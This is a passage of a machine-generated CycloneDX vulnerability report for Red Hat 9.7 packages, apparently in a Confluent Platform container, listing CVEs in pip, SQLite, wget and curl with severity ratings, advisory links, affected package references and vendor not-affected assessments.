          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Mercurial is not available in RHEL 8 and 9, so the vulnerability cannot be exploited. Without mercurial installed (the hg command), pip cannot clone and install from hg+http[s] URLs."
      }
    },
    {
      "id": "CVE-2024-0232",
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-0232"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-0232"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243754"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0232"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240315-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-0232"
        }
      ],
      "published": "2024-01-16T14:15:48+00:00",
      "updated": "2024-11-21T08:46:06+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.34.1-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/sqlite-libs@3.34.1-9.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-10524",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        918
      ],
      "description": "Applications that use Wget to access a remote resource using shorthand URLs and pass arbitrary user credentials in the URL are vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-10524"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/11/18/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-10524"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778"
        },
        {
          "url": "https://github.com/advisories/GHSA-mqrm-h2pw-9j9r"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability"
        },
        {
          "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10524"
        },
        {
          "url": "https://seclists.org/oss-sec/2024/q4/107"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250321-0007/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-10524"
        }
      ],
      "published": "2024-11-19T15:15:06+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2024-11053",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, curl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches\nthe redirect target hostname but the entry either omits just the password or\nomits both login and password.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-11053"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/12/11/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-11053"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-11053.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1671"
        },
        {
          "url": "https://github.com/advisories/GHSA-h288-5fq8-5pfw"
        },
        {
          "url": "https://hackerone.com/reports/2829063"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-11053.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11053"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250124-0012/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0003/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20250131-0004/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7162-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-11053"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2025.html#AppendixMSQL"
        }
      ],
      "published": "2024-12-11T08:15:05+00:00",
      "updated": "2025-11-03T21:16:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
